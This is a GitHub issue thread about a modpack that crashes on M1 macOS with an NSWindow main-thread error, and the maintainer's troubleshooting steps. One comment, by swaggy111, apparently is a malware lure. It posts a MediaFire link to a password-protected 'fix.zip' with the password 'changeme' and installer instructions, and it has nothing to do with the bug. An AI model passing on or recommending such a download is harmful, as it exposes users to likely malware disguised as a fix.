### ISSUE TITLE
Crash: `NSWindow geometry should only be modified on the main thread!`

### ISSUE THREAD

**Issue by MrAkells** [Krutoy242/Enigmatica2Expert-Extended#408]
## Description

When attempting to run, I get an error. The issue occurs specifically on macOS, on a laptop with an M1 chip. On macOS with an Intel processor, it used to run fine, but the issue might not be related to the processor.

**To Reproduce**

1. Just launch modpack on macOS
2. See error

**Modpack version** `v1.43.0`

**`debug.log`**

[debug.log](https://github.com/user-attachments/files/16746340/debug.log)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Krutoy242** [comment]
It feels like some file paths in MacOS cant work properly. 
Try this step, one by one:
1. Remove Optifine and try to load modpack
2. Remove VintageFX and try to load modpack again

If this steps couldnt help to fix the issue - please report here.

**Comment by Krutoy242** [comment]
Please, write if this issue is still actual. For now, I will close issue until more information.
